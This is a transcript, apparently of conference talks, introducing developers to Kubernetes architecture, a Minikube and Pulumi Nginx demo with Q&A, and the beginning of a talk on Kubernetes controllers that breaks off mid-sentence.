 an engineer in maybe the worst way possible by trying to get K3S like four or five years ago before it was as stable as it is now to run on a Raspberry Pi for a miniature self-driving car I was building for work, which sounds ridiculous in retrospect, but I promise we had a reason for it. And the way I explain Kubernetes now is really heavily influenced by that experience, by my experiences teaching bootcamp grads, intro's to Kubernetes, and my experiences handling some comms-related kerfuffles for the Kubernetes project, wherein I learned just how little developers tend to know about Kubernetes even when their app is being deployed on it. So if you want to get a hold of me later, my Twitter handle is Dixie3 Flatline. You can also try emailing me at work. I would not recommend trying that. I'm not great at replying to emails. So let's go. First off, why should developers even care about Kubernetes? The answer is because you are probably going to have to touch it eventually. Even if you're not developing with Kubernetes locally now, it's increasingly likely that the application that you're building will be deployed with it. So it's similarly increasingly likely that you're gonna be expected to be able to test it locally so that there aren't any surprises. At the very least, you're gonna be expected to understand containers as the shift from monolithic architectures to more of a microservices situation moves some of the responsibility for standing up and making infrastructure decisions from exclusive the ops team to more of a shared responsibility, which is kind of the whole point of DevOps, right? We're trying to meet people in the middle there rather than just chucking things over the fence. But nobody is asking you to become an expert. There are entire people whose jobs it is to be an expert in Kubernetes. The average developer does not need to do that unless you wanna pivot towards specializing in Kubernetes, which a couple of people in the crowd here have done. You really just need the basics. We'll start with defining what Kubernetes actually is at a surface level. It is an open source container orchestration tool. And a container orchestrator is a tool that automates the management and deployment and scaling of containerized applications. While it is possible to do all of this by hand, it is slow, it is unreliable, and it is a massive pain. You don't wanna have to do it. We've all heard that Kubernetes is difficult to learn. This is like a longstanding thing that we're kind of trying to get away from. And part of that is talks like this and tracks like this to make it feel more approachable, but I promise you that if you're in a situation where you need Kubernetes, it is much harder to go without it than it is to just learn it. You can think of container orchestration in terms of a container ship. It's a super common way to explain the way this works. Kubernetes and other tools like it, there are other things that do this like Docker swarm and mesos. It's the thing that dictates which shipping containers go where on the barge in relation to other shipping containers and what goes in them. So it's the person at the dock with a clipboard, right? These collections of organized containers are called clusters. So container orchestration means that there are now a whole bunch of things that you don't have to worry about anymore. Scaling your application happens with much less effort. So say you get hit with a ton of traffic, your app goes viral somewhere and suddenly it's very, very popular and you need to handle it. In most cases, that is a one-line change in whatever tool you use to define your cluster and what your application looks like on it. You just bring up more replicas, right? Instead of going to your cloud host and provisioning more servers, deploying your application to those new servers, testing that application on those new servers and configuring all of your proxies again. That's a much bigger pain, at least for me. You don't have to worry about deploying those individual servers anymore or testing them, Kubernetes just spins up another replica and a lot of security and networking concerns do get abstracted away from you. That is not to say that Kubernetes is inherently secure. It definitely isn't. It solves some security concerns that you have with other ways of deploying and scaling applications but it introduces some new ones, so do not fall prey to the long-standing meme that Kubernetes is secure because it's not. Same goes for networking. In some ways, it's easier. In some ways, it's harder. You are making trade-offs here. So complex Kubernetes may be, but that's because of how much previously manual labor it is doing for you. The operational overhead of getting going can be a pain and it does require specialized knowledge to put it up there and to maintain it, but once you get to a point where you really, really, really need a tool that's powerful, like your team or your org should have the resources to handle that, I am of the opinion that not everything needs Kubernetes. In fact, a lot of things super don't need Kubernetes but it never hurts to be prepared with kind of knowing what it is. Besides all of that, the Kubernetes community is massive. It's really, really big. It's really, really friendly. It's made up of me and the track hosts and a bunch of other people in the crowd here and hopefully the rest of you who are new and just went to the 101 workshop yesterday. We all want nothing but to build this better and extend it and make it easier for others to come help build it better. So I hope you join us. If you have a question ever after this talk, 10 years from now in the process of using Kubernetes, we have a huge online community and we will happily answer your question. If we don't know the answer to it, we know who does and we'll point you at them, which is the real power of the Kubernetes community. So come hang. Before we go further and dive into Kubernetes architecture, I want to address the big blue whale in the room. I'm glad that I included this slide because somebody asked me a question about it earlier today. Docker and Kubernetes get conflated quite a lot and it can cause some problems. So what does Docker have to do with Kubernetes? If you were a developer, you might be used to using Docker locally for dev. This is a particular point of confusion for engineers touching Kubernetes for the first time and one that we have underestimated before. So this is worth mentioning for the folks in the room who are touching Kubernetes for the first time and have like literally no context. Colloquially, we like to say Docker image, right? But it is really more of like a Qtap Clarex situation. When we say Docker image, like the image Docker produces is actually what's called an OCI compliant container image. OCI stands for Open Container Initiative and other tools can produce OCI images too. Wildly popular and also being a really important part of the Kubernetes projects history. It was the original and only container runtime for Kubernetes for a while. So unfortunately, it's a little annoying, but at this point, you kind of just have to figure out from context clues, whether somebody literally means Docker desktop, the tool you were using for local dev, or if they are referring to any old container image. But functionally, there is no difference between a thing produced by Docker desktop and a thing produced by like Podman. Now you know, hopefully that solves some confusion for the person I talked to earlier. Now we've cleared that up though, let's talk about the anatomy of a cluster and see where those containers end up living. So Kubernetes is extremely complex. Wow, that's fun. Oh, I didn't even get to the good slide. There is a good slide too. What is happening? Is it my computer? I can't tell. Cause it's, oh, should I kill my cluster? Actually, how about I plug in my power on the other side and see if this computer is doing that thing, that it's haunted. Is it haunted? It's fine on my display. The next slide. That's just, it's a 2015. 2015. Yeah, yeah. Switch to the second part right here. Okay. No, put the actual video out. Oh, okay, yeah. I think so. Everybody get a teaser of my funny slide. I'm glad everybody actually thought it was funny too. Yeah, I just gotta, there we go. We're back. Not glitchless buddy. I can switch laptops. I just can't use my terminal on the other one cause it's an M1. You know when you try switching laptops? Always have a backup. Yes. This is an anxious habit I picked up from Jessica Dean. Because she always travels with a second laptop. Just in case. Okay, okay. It's my 2015 that's cursed. It can't run. I was concerned that was gonna be a problem cause this laptop is old. It can't run any Kubernetes cluster and video at the same time I guess. Anyway, sorry about that. So, Kubernetes is super complex, right? And this complexity is one of the things that can make it so difficult to teach and learn. But fortunately, you only need the broad strokes at first and we're getting better at explaining this complexity in a way that makes sense to humans. I promise you that almost nobody is a subject matter expert in the entirety of the whole situation. Most people specialize in only a couple aspects of Kubernetes like networking or storage or security or authorization. Absolutely nobody is an expert in the whole kit and caboodle. I doubt even the people who originally built the project are at this point because it's so different comparably. And this diagram or one like it is how people usually explain the pieces of Kubernetes. I've taken this one straight from the Kubernetes docs and it does a perfectly fine job. It's very well annotated, it's very clean. But I think it's boring and it's unmemorable and I had a really bad idea that I have to get out and y'all are trapped in a room with me. So, you have to learn from a different diagram. This is Kubernetes, okay? This is Kubernetes. If you use Kubernetes already, you will understand immediately both like architecturally what's going on here and from the vibes this dog is exuding. This dog has tired cluster admin energy, like for sure. And for everybody else, allow me to explain Kubernetes architecture for you with the help of this Chihuahua standing on eight cheeseburgers. This whole situation here is your Kubernetes cluster. Each cluster needs to contain at least two things, a control plane and a worker node. The worker node contains the pods that make up your containerized application workload and that is the bare minimum. That's what you need for a cluster. In a production environment, you would see one control plane maybe across multiple machines managing multiple nodes. Maybe each node is a dedicated machine to maintain high availability. So the control plane is the thing that manages what's going on with your nodes and your pods. It's responsible for managing everything to do with your application workload and with the cluster itself. The control plane itself includes several smaller components as well. It's got the CUBE API server, which is responsible for exposing the Kubernetes API for use at CD, which I am now pronouncing correctly in this talk, which is a key value store for all of your cluster data. The CUBE scheduler, which takes care of assigning newly created pods to nodes and to controller managers, which are responsible for managing a whole bunch of control logic and one of them is cloud specific. The exasperated Chihuahua is your control plane. So a node is a worker machine responsible for managing one or more pods. The node contains all of the things the pods need to operate, like your container runtime, as well as the pods themselves. Nodes are made up of three parts. The cubelet, which is responsible for babysitting your containers by making sure that they're healthy. CUBE proxy, which is for networking. And a container runtime on which your containers ultimately will run. There are different container runtimes with different advantages. Most cloud providers default to containerd, which is actually pronounced containerd. And each stack of burgers here is a node. A pod contains all of the things that make up your application workload in the form of containers. In the case of this image, our application workload is what I assume is a McDonald's dollar menu cheeseburger. So we have containers for a slice of cheese, ketchup, the burger patty, onions, pickles, the bun, those little dehydrated great onions are incredible, and I wish more places had them. Because we've got friends coming over. We've told this cluster that it needs to maintain four nodes, two pods each, for a total of eight replicas of the same cheeseburger. Thank you for letting me quell the screaming of that particular brain worm. So, now you know what makes up Kubernetes architecturally, but you wanna play with it on your own. Deploy some stuff, scale it up and down, good news. There is no reason to go straight to cliff diving into the ocean here. There are tools that abstract away some of the more nitpicky parts of running Kubernetes, like dealing with some specific like networking and security concerns that just do not matter if you are doing it locally for fun testing playtime, but you do absolutely need to worry about in prod. These tools, however, do not generally prevent you from digging into the API if you want to, so you can still experiment. So, we are gonna stand up a little cluster and deploy something really common to it, Nginx. I will say that since I've had to switch laptops, the demo itself is running on this one. I have slides for it just in case of this, but at the end, if my laptop wants to give me a second chance, I will switch back over to it so we can actually poke at the running cluster. So, for my cluster, I use Minicube. Minicube is what I prefer to use when I'm just messing around on a local machine, but K0s and K3s also exist and are really cool. They are both meant for more like IoT embedded applications on like really small, low memory machines. You can, of course, also just use a full featured managed Kubernetes service on a cloud provider like GKE or one of the 85 million ways AWS now has to deploy containerized workloads. It's truly getting out of control and I honestly don't know what most of them do anymore at this point. Personally, I check everything on GKE because I know what it does. Anyway, for situations like this, I do prefer to stick with things that aren't gonna accidentally run up a huge cloud bill if I forget to tear down my infrastructure at the end, even if it's not exactly production ready. So you will see me have to like do some weird stuff and take some shortcuts because I'm using Minicube and not like GKE. So this is step one. I really wish I had my computer for this that would let me show you, but anyway, I would have had to do this slide anyway because installing Minicube takes like 10 minutes on that computer. It will not be that slow for you if your computer is newer than 2015, but anyway, this is Minicube installed and starting. You can see I've set some flags here. One is to specify a driver just to show you that you can. This used to be necessary in order to use some particular aspects of Kubernetes on certain operating systems. So if you go to try this yourself and you're running into a weird problem where for instance, an ingress controller isn't working, if you're on a Mac, it's because you need to be using the virtual box driver. There are a bunch of other drivers that come with it. It will default to Docker usually, but there's also HyperKit and a couple of others. You can also see that I'm sending the memory that Minicube is allowed to use, which can be useful by default. It wants to use eight gigabytes of memory. The total available memory on this laptop is eight gigabytes. So obviously, I can't let it do that. Anyway, running Minicube start is literally all you need to get a small cluster off the ground. It's gonna immediately stand up a control plane and a single node for you. You will also need a cube CTL, also called cube control, also called cube cuddle or cube for any of those, and it has become a little bit of a clicky thing who says what? But it's, I'm looking at you, Quinn. You say cube cuddle? I know officially it's cube cuddle because it's got a little cuddle fish, but I just can't, my brain doesn't do that when I read it. Anyway, you need this tool in order to interact with your cluster directly, and you need it regardless of whether you are working locally or you're working on a cluster on a cloud. You just hand it a file called a cube config, which tells it where your cluster is and gives it the keys, how to access it. Helpfully, Minicube places a cube config for you in a default location that cube control knows what to look for. So this allows us to look at our cluster, see what's going on in there, and make it run stuff. Defining what's going on inside of your cluster can be done in a variety of ways. This is also ripped from the Kubernetes documentation. If you wanna just use vanilla Kubernetes, you can write your deployments and service definitions as YAML and apply them with Cube CTL. There are also a bunch of different infrastructure as code tools that you can use to stand up your cluster and deploy things to it. I will show you one of those later, but this is what the deployment YAML would look like for an Nginx deployment if you were to just use Cube CTL. At the top there, you can see a kind of deployment. That means that this file is going to create a deployment object and its only job is to dictate what container is being deployed under what conditions and how many replicas of it need to stay online. In this case, it is two replicas of a container running Nginx at version 1.14.2, running on port 80. A quick note on Kubernetes objects, by the way, there are a bunch of them. A deployment is just one of them. I will also use a service object later, but there are also namespaces, volumes, replicasets, stateful sets, a whole bunch. They also, different purposes, and most of them are beyond the scope of this talk. Frankly, I think you could probably give an entire talk just on Kubernetes objects, just because there are so many of them. And YAML is totally fine, for simple examples like this, by the way. They do, however, get really, really, really hairy if you have something vaguely complicated that you're trying to define. They get to a point where it can be kind of hard to read. It can get kind of hard to manage what's going on. You poke one thing and the whole thing falls over. I also prefer to write in a programming language, if I can, so that I can stand up my infrastructure alongside or even in my application. So because of this, I'm gonna show you what Pulumi looks like instead of the kubectl approach. And I will tell you where to get this code so you can all just stand it up yourself too. Sometime tonight, I will put my slides up online on notice and it'll include links to where all this stuff came from in the Kubernetes docs. So this is what that same Nginx deployment looks like in Python. It contains the exact same information, but it's expressed programmatically and it's a lot more dense. For me, a person who has only ever been a developer or a developer advocate and has never worked in ops, this is much easier for me to read. And I know that that's not true for everyone, but I like to not have to learn a new syntax if I can avoid it. But yeah, this is the exact same information, though instead I've got six replicas, yeah, six, and it's running a more recent version of Nginx. But to make this thing actually functional, a deployment is actually not enough. We need a service too. This is a service deployment expressed in Python. While deployment objects dictate what's running and how many of them, services in Kubernetes manage network access. This one, if I was not using Minihube, would stand up a load balancer for us if we were running on something like GKE instead, but Minihube does not support those. This is one of those places where I have to take a weird shortcut because it's Minihube. Instead, it is going to give us a cluster IP. That decision making is handled by the presence of a config value that I set before actually running anything. So I got all that Python and I wanna turn it into an Nginx deployment running in a Kubernetes cluster. You just need to, in my case, run, pull me up and it'll give me a little overview of what's gonna happen if I say yes, deployment and service defined, standing up in my project for this demo. Click yes and it creates the resources for you in about 13 seconds. This is what I mean by speed running and also what I mean by any percent because this is not a production ready cluster. This is like how fast can I get a cluster online and something in it. It doesn't matter how functional it is because frankly for teaching somebody Kubernetes, giving them an overly complicated, like full stack application is in my experience not very useful. It's difficult to grasp. So 13 seconds is what it took to stand up these resources in a cluster which at first when I started using this tool, I found it unbelievable how fast it was and I super did not trust it. But it is there and if this computer behaves, I will be able to poke at it. So we have all of this stuff here. It's got an output at the bottom, front end IP. That is the cluster IP because again, this is a mini cube which does not support load balancers but we can still look at our engine X deployment outside of the cluster and prove that it's online. So another mini cube oddity, I do have to do some port forwarding to be able to actually access that. But fortunately it is a one liner with cube CTL and we only need a little bit of information from our running application in our cluster to do it. We're gonna go look at some stuff here to confirm things are up. If you run cube CTL get pods, you can see that I asked for two pods to be up and they are up. And if you run cube CTL get deployment, you can see my deployment object which again, I told to have keep two pods online. You can see it's got two out of two ready, two available to up to date. And it had been online for 42 minutes when I took the screenshot. But what we actually need is the name of the service we stood at because remember that is our network access. So you guessed it, cube CTL get service and it lists the services we have running. If you grab the name of that container there, you just forward the port for the container to my local and then you can call it and see that engine X is online. Well, I'm gonna try to get this computer up there without slides so that I can actually open up my terminal and let's see if I just kill Chrome, it'll go. And then we can look at stuff running. Let's find out. Thank you. You are a peach. Let's just mirror it. So do I still have things running? I do. So the whole cluster is still up here and a thing that I wanted to show you what I mean by Kubernetes scales fast is we've got two pods there, right? So say that we need this to be suddenly much bigger. Literally just add more replicas and update the config. It's gonna say I've got one thing to update. Letter rip. And now there is six of them immediately. So this is so fast because it's such a small workload, right? It's literally just one deployment, one service. It is engine X, but it's still, Kubernetes is a little bit more approachable this way. When you're working locally with a really small workload and it's a good starting point, right? Engine X is a thing that many of you have probably had to use in the course of doing your job. You at least know, this is one person raising their hand. Is that big enough? Yeah. Let me see if I can get it. Does that go? Ooh, it's computers starting to struggle a little bit there. Yeah, so we've got our six pods online, but this is a good starting point, a good jumping off point from like building something yourself a containerized application in Kubernetes because it can just like pull containers from wherever. You can build a piecemeal application if you want. You can also write your own application inside of a Docker container, chuck it onto a public registry and go from there, right? So I know that demos like this aren't technically impressive, right? There's not a lot going on here. It's not very complex. I've only got two pieces. I don't have like database interaction or like a whole bunch of third party stuff. I did not stand up a service mesh or whatever, but try when you're like learning something new, especially something as big as Kubernetes, not to like jump straight into the deep end. It's more important to understand like the foundational aspects of how a tool like this works so that when you do get more complex and start adding on pieces to a demo like this small, it is a little bit easier to intuitively figure out where you're going wrong if things aren't working the way you expect. If you understand like the way the pieces of Kubernetes air out with each other, you're not gonna get lost as easy. It might not be as exciting, but it is, you know people advise that instead of like banging at your keyboard for 30 minutes, you instead spend like 15 minutes reading the docs. It's that. It's that. Do not just like go in blind with a wildly complicated cluster with you know, 15 microservices making up a JavaScript website. It's like not, it's not necessary. It's not necessary. It works instead. But this is what Kubernetes looks like. This is how it works at a very high level. If you would like to learn more about Kubernetes, if you wanna go for like a, you know, 200 level situation, the interactive tutorials on the Kubernetes website are actually pretty good in my experience. I really, really like them. They also use Minikube. So it'll be a familiar tool And also, the CNCF Twitch account and the Kubernetes Slack are both super helpful. The Kubernetes Slack in particular is very, very, very active. There is a Getting Started channel and I cannot repeat this often enough. There is no stupid question. There is no, like, don't apologize for not knowing the answer to something. We want to help you learn as much as you wanna learn and nobody's ever gonna make you feel bad here for not knowing something because I didn't know stuff for a while and there's still, like, so much stuff I don't know. So come, come help. And then once you're off the ground, you know, pay it forward, answer somebody else's question that there may be a little bit embarrassed to ask. And now I will unplug my computer because it is still screaming and I don't wanna give somebody a motion-sensitive migraine because of the flashing on the right side of my screen. But if anybody has any questions or comments, let her rip. Can you use Pulumi to manage home-based deployments? Yeah, yeah, yeah, you totally can. There is a Helm provider. It also, like, doesn't really, there isn't really a whole lot Pulumi can't manage as far as, like, Kubernetes resources and, like, cloud-native stuff, but yeah, I use it with Helm all the time. Yeah? Can you put the picture of the dog up again? I didn't get to take a picture. Yeah, yeah, absolutely. Would you like the picture of the dog up with just the dog or do you want it with the annotations? Okay, yeah, no problem. More questions? That's, that's fine. Is... No, no, no, it's okay. You know what? The dog came from Ian Coldwater's kid, was writing a talk and tweeted asking, like, what, what is Kubernetes? For people in the room who don't know who Ian Coldwater is, they are a Kubernetes security expert and also very popular on Twitter. So, let me get the dog back. But Nara, Ian's kid, tweeted asking what is Kubernetes and I responded with that dog. I was, like, super hungover. But I just responded with this dog and I was, like, I can't explain it, but this is Kubernetes and now I've explained it. So, yeah, there's my preferred Kubernetes architecture diagram. I have one question. Oh, sure. Is there a path of migrating from mini-cube to a real Kubernetes cluster? I have found in the field that developers end up putting the stuff in production stuff in mini-cube. If you have been building your entire app in mini-cube, mini-cube does have a lot of limitations that you're not going to see with something like GKE or EKS or whatever. And I would not say that you can, like, directly port a deployment that was intended for mini-cube, taking the, like, shortcuts and roundabouts that mini-cube requires to a full-fledged situation. There are issues that you have to consider and some of them are those, like, networking problems that you saw me go through. Like, those problems, you can't port that directly over to GKE. You are going to have to, like, use a real load balancer. Do not return the cluster IP. You can return the cluster IP, but, you know, don't. Right, so then... Right, also there's a mini-cube stubs out all the storage. Yes, like, mini-cube is, it's got a lot of, it's not intended for production. It's like, it's extremely not. Use that for testing. Use that for a playground. Do not, you try to use mini-cube for a pod. It's got all kinds of issues that, like, cannot be addressed in mini-cube, security issues, networking issues, storage issues. So don't build from the ground up with mini-cube in mind. It can. I'm not sure, like, what, from a technical perspective, prevents the load balancer objects from being available in mini-cube. Go in, do you know? No? Hi. Yeah. Yeah, do you want to repeat what people are saying if they're not on the mic? Oh, yeah, sure, sure, sure. The question was, like, can, in mini-cube, is there not peer-to-peer connections available between pods? They're, like, it can communicate between pods, but I am not sure why the load balancer object doesn't exist. Does anybody actually know the answer to that? Yeah, it does. Good point. It kind handles it, though, so. Yeah, I have a related question. So you're saying don't just do your entire development in mini-cube, but sometimes it's useful to have sort of a development replica of your production cluster so you can do local development. So I'm curious what the story you think is appropriate there is, do you, how do you end up building that such that you can have better developer experience for people working locally? Yeah, so there are just special considerations for, like, for mini-cube that, unfortunately, you can't get around if you're trying to clone your production environment. I think kind gets a lot closer to having, like, a true ability to clone a production environment. That is what Gwen here in the front uses. I like kind. I'm using mini-cube for this strictly because it is what the Kubernetes interactive tutorial on their website uses, so I wanted to make sure that there was some consistency there. But yeah, unfortunately, if you are trying to use mini-cube as your local dev environment and you want it to be a true clone of prod, you are probably going to have a bad time and you're better off just using kind or something like it's a little bit more flexible. There was somebody in the back that had a question. Thank you, Josh. Hey, thank you. So does this mean that, like, if the pod owns that the dog will just eat the hamburger? The dog does not get to eat the hamburgers. The hamburgers are reserved for users, which are our friends that are coming over to eat those hamburgers. Unfortunately, the dog is just there to make sure that the hamburgers exist and perhaps protect them from other dogs. Gotcha. Yeah, well, maybe the cat. I find that, like, using kind, because you can use programmatically, use the animal to spin it with multiple clusters as well as rancher desktop. Additionally, you may want to add metal LB to get that cluster happy. Okay, thank you. Hello, more of a Pulumi question rather than a Kubernetes question? Sure. I'm wondering if there's any good static analysis tools since we get to use real programming languages. I know, like, a really basic example. I'm more practiced in CloudFormation, so one really annoying thing, right, is if you don't set your auto-scaling group properties correctly, like, oops, I set my desired server to less than what I said my minimum was. Submit the template and then wait 10 minutes, and then you're like, oh, you didn't do it right. So I'm curious, you know, since we're using real programming tools, or real programming languages, if we can take, if there are any good tools to take advantage of that, to do this kind of checking and make sure, hey, nope, don't submit that yet. There's some mistakes. There may be a third party one that I'm not aware of. There is, the closest thing, like, built into Pulumi is if you run Pulumi preview, it's going to give you an idea of what changes are happening, and some of those potential changes can cause a failure on Pulumi preview. So some of them you will know in advance if this is just going to barf, which is good. But as far as actually analyzing whether or not you've made a logical misstep in your code, Pulumi doesn't do that itself. There may be a third party tool. Gwen, do you know of any? Gwen is also, she is an engineer at Pulumi. Are there any stack analysis tools for Pulumi that would identify when a, you've made a logical error in your deployment, like setting a minimum different from a maximum in a way that, like, conflicts? For Pulumi? Yeah. Like, you would just run Pulumi preview to see a lot of that stuff, right? Yeah, you see, you run Pulumi preview, and the info output should have most of the standard logs, and you can also access diagnostics, run it in verbose mode, all of that, yeah. Yeah, do you know of a third party tool that goes more in depth? I don't. No, but sometimes I cheat by going to the debugging Pulumi site on Pulumi.com, and I run log to standard error, and I get a bunch of logging output, and then I use grep. That's a hot tip, actually. Don't tell my boss I said so, though. This is recorded. I'll also say that because it's a complicated stack, there's a whole industry in analysis tools, so look in the CNCF landscape. Yeah, definitely. I realize that's a bit of an adventure, but there... You're asking for a lot here, Josh. Yeah, yeah, but I mean, like, because it's a complicated stack, you're actually probably gonna be swinging together multiple tools to look at, like, one's gonna look at security, one's gonna look at, you know, is auto-scaling actually gonna work, how you've configured it, and then another one's gonna do something else. Oh, and you absolutely need an observability tool. Like, do not just, like, go pawing through logs by yourself, ever, unless you, like, really need to double-check something. Like, there are observability tools that handle that for you and make it a little bit more human-readable, less messy, because the logging output can get very messy. Uh, are there any more questions? Yeah, hi. Hi. Thank you very much for a very nice talk, and Dope is simply amazing. Thank you. Well, it's kind of maybe a new big question, but there were comments that Minicube likes a load balancer, and I was playing with it, like, literally yesterday, and there is a plugin or add-on to Minicube called Ingress, so you can say something like Minicube-enabled Ingress. Isn't it the same as a load balancer, or what was your comment on that? Nginx Ingress is not quite the same as a load balancer. It's an Ingress controller, but that is actually, like, a thing I mentioned. It was why I was setting a driver. If you are standing up Minicube and you are setting up an Ingress controller, it can cause problems with old MacBooks and you need to use a different driver. Yeah, an Ingress controller is a different thing, but in that case, it can serve a similar purpose to a load balancer, so it kind of gets you there, right? It gets you the same result, but it is not the same thing as a load balancer anymore. We have time for one more question. Pulumi, do you use your local Minicube cluster? Do I have that code on this computer? Probably not. It is on this one. So my code makes that decision for me, actually, because I knew that I was gonna be doing this with Minicube, but sometimes I do this with a real provider, and so, so when you are setting up Pulumi in the first place, it is going to look for a cube config, and it's going to look for a cube config in the default location first, exactly where Cube CTL looks for it, which is in the hidden cube directory in your root. So it looks there, and your cube config just needs to contain the access keys for your local Minicube cluster, and then Pulumi will just pick it up, but if you want the same decision-making I had where this can run on a local cluster or this can run on a remote cluster, I use a Pulumi config value, so it's just is Minicube, config require is Minicube, and before I run Pulumi up, I just set that config to true or false, and then it makes a decision from there, there's a little if-else in the bottom of my code. This particular sample code is online in the Pulumi GitHub account in the examples repo. So just github.com slash Pulumi slash examples, and there's like a whole ton of Kubernetes examples in there, and this is the Nginx one. So you can just rip that code, and it will go. And then I think that's it, that's time. Yeah, thank you very much, Kat. Okay, stick around, what's next? What is a Kubernetes controller? Why would you want to replace yours? What would you want to replace it with? Jim will be answering those questions in 10 minutes. Test, test, test, okay. Perfect. If you have your cell phone in your pocket, on the pocket. Interference, got it. Then to turn it off, I just, okay, welcome back everybody. And next up, we have Jim Tario, who is going to equate you with the wonderful world of Kubernetes controllers. So welcome, Jim. Hello, everybody. That's a lot of the wonderful, because Kubernetes can be, it can be great, but it can also be a pin in the ass. So, you know, as we all, if you play with it, it's very useful. And I have been playing with it for the past five years. Actually, so yeah, we'll start off. To break the ice, I wanted to introduce myself as, this is actually pretty much my first time doing a talk at a conference, so I figured I'd introduce myself. Thank you. So, actually, I'm a local. I grew up in San Antonio, California, which is about an hour away if you go a little bit down south. It's in Orange County. My name is Benic. My second generation, parents are from El Salvador. And yeah, right now, currently, family of four, wife and two kids, one year old and four years old. And I graduated from CSUN, so I've stayed in California pretty much my whole life. And CSUN, not familiar with the area, it's right here up in North LA. And I graduated in 2016. And now, since I graduated, I went to work at Blizzard. I actually did an internship when I was in CSUN, and then got hired full-time from there. So I started off as a junior associate, junior, sorry, and then I went to Mannington to senior. I worked in the battle net team. I was there for about three years. Yeah, three years. And it was mainly dealing with the public, like facing APIs and websites, so like, you know, PlayoverWatch, World of Warcraft.com and stuff like that. Currently, I used to go over to team three, which is the Diablo team, which is the Diablo franchise. So if there's like Diablo issues, either one of my coworkers is being called up if there's some reliability issues. And just hobbies of mine, I enjoyed playing poker, fencing football, watching anime, reading manga, One Piece, if anyone was familiar with it, my favorite, I enjoyed snowboarding, and of course, video games. And in case you want to get my social media, I'm somewhat active, I don't use it as much as I should, but you can follow me, it's Jinx. It's funny, because this account, I got it in 2009, I think, and I don't know why I added a three on there. Now I can't get it, someone took my account, I can't even put Jinx on there. But yeah. So, what are controllers? So controllers, they work as a control loop. They try to keep a desired state on your system. So you have a currency, you have a desired state. The community's documentation is a very good example of a thermostat. A thermostat, you set it to, let's say, 70 degrees. It will try to keep that desired state over time. So if the temperature increases, it's going to go back and try to decrease it. So that's how a controller works in your system. So what it does, it watches the state of your cluster, so it looks at the community's resources and it will create them, so let's say, a good example would be a pod, like pods. If your pod goes down, it goes to a state, it goes to a state of zero, but your desired state might be one or two. So the controller will do, it will spin up another pod, and that's how pretty much it operates. There's also a term called operators, which are domain-specific controllers, and these can be very specific to an application. An example would be, you promote the Prometheus operator, and it will look at Prometheus customer resources that you've created or spun up, and it will pretty much, let's say, a Prometheus rule that you create if you create a new resource, the controller's going to look at it and create it for you. I'll go into more details as I go on, but just want to give a heads up, I kind of blur the line between a controller and operator because they are different, but I just like using the term controller. So in case I do a specified application that it's actually an operator, I might have said controller, just a heads up that I'm going to do that. So let's see. Okay, so we'll start off with the first one, the ingress controller. I kind of caught it at the end of the last conversation, the last presentation, we'll talk about ingress controller. So I'll go over three, just because these are supported by the Kubernetes project, but there's a lot, a lot of controllers. Some of you might be familiar with Kong, there's traffic or traffic, I'm not sure how to pronounce that one, but those would be one of the more popular ones as well. So the ingress controller, what it does, it looks at, so it depends on which controller you're using, so like the ingress controller, it will look for, it looks at the, the controller looks at, it talks to the control plane, the API, and if there's like a ingress or service that gets created, it will look at that, and if it matches certain requirements, it will spin up an ingress for it. So, IngenX uses annotations. Use annotations, let's say hostname, and then you will have the address under that you want. The controller will look at it and spin up an ingress with that hostname that you have in the annotation. The reason I have the ingress controller as well is because it's pretty much, you don't need a cloud provider, you can have your own, so you spin up like you have your own cluster and it's in a different cloud or private cloud, open stack or whatever it is. You don't have to rely on a provider. So the AWS load balancer controller works in a similar way as the IngenX controller, but it actually creates load balancers on AWS. So it could create ALBs or network load balancers, and it works in a very similar way where it's annotations that get added. And then the ingress.gc is just the Google Cloud version of it. So these will be three in case you want it to allow external access to one of your services. And those will be the ingress controller. And then I think I'll share this slide I think after or the skill. So in case you want to like the links, I put them on there. Just in case you want to go to the GitHub repo. A lot of these are open source and they also have my preference is home charts. In case you do want to install them, there's home charts as well, but these are just applications themselves. And then as I mentioned, there's a lot of ingress controllers and if you click this link, it's the community documentation. They have, last time I saw it, they'll take 15 plus controllers on there. So in case you wanted to look through and see none of these fit your use case, you can go on this site and go through and see if there's anything that you might be able to check out. Then for monitoring, one of the controllers that I prefer, that I like, it's mentioned the Prometheus operator. The Prometheus operator, it creates custom resources onto your cluster. So you have, for example, if you're familiar with the Prometheus operator, they have, they create a custom resource definition that is called just like Prometheus rules. There is service monitors, pod monitors, and these are pretty much resources that the operator is gonna look at. So in case you do create a resource with that kind, it will spin it up for you. So if you create a Prometheus rule, you can create it, depending on the time that it scrapes, it will spin up either alert and alert manager or whatever, however you set it up. It has service monitors, which is like an abstraction layer in case you want to monitor a service. It looks at labels and it makes it very dynamic instead of having to manually create or make changes or maybe even like an app deployed to add stuff, so it makes it very dynamic. It's also, of course, this one is an operator and it looks at the API for any of these CRDs. And then the Prometheus stack, this one is actually, it's not a controller, it's more of a home chart. And the reason I put it on here is because it's super useful because it installs the operator, it installs Grafana for you, it installs alert manager, and pretty much end to end stack of Prometheus. So once you install this, I won't give a warning that the values file and helm is very large and it's massive. So if you go through it, it can be kind of painful, but you get kind of adjusted to it and you can kind of see what you can do with it. But a better minimum, you can enable everything and you would get even the metric server to scrape metrics by default, you get default Prometheus rules that are super useful. Yeah, so then secrets, secrets, if you play with communities, like they say secrets but it's actually just a base foreign coded string that you can cat it or you can view the resource and you could decode and get the string. So that's not so secure, but how do you put this in, GitOps is very popular, how do you put this in source control? And it's not good to put passwords in source control just because, I mean, obvious reasons. But my favorites is external secrets just because it's very agnostic and what it does, it allows you to create secrets without having to like hard code them. It looks at a provider, it pulls them and injects them onto your community's cluster. So same thing, it's an operator and the external secret management systems which can be like AWS Secrets Manager, it could be the Google one, yeah, Google Secrets Manager and then of course agnostic would be Vault. It's not specific to a cloud, you can spin up your own version of Vault or spin up your own Vault instance and manage your secrets there. So the external secrets makes it very easy to play with these different providers and you can go for that cloud agnostic way or you wanna go cloud specific you can or if you wanna, you have multi architecture, infrastructure, you can have one external secrets that can talk to different providers which is super neat. And it's also neat because it's very dynamic. So as the operator, it always watches. So there's a change on the secret, let's say a secrets manager, you update the secret and depending on how your app's configured, if you update the secret, it is very quickly the controller updates the secret on Kubernetes resource. So you don't have to actually like go and apply a change onto the Kubernetes cluster because you just update on secrets manager and it updates it on the secret on the cluster. And if your app can make changes in runtime, you don't have to do any restarts, you can do life changes and let's say a password gets exposed or something happens, you could just go on secrets manager and update that secret. And you also have, depending on your secrets manager setup, you can have versions. So in case someone deletes a secret or you need to get the old one for some odd reason, you can just look at the versions and pull it up. And yeah, so this one's kind of different because it actually is not talking to the API for those changes, it's actually talking to the provider for the controller to keep that state. And then DNS, our favorite, external DNS would be my 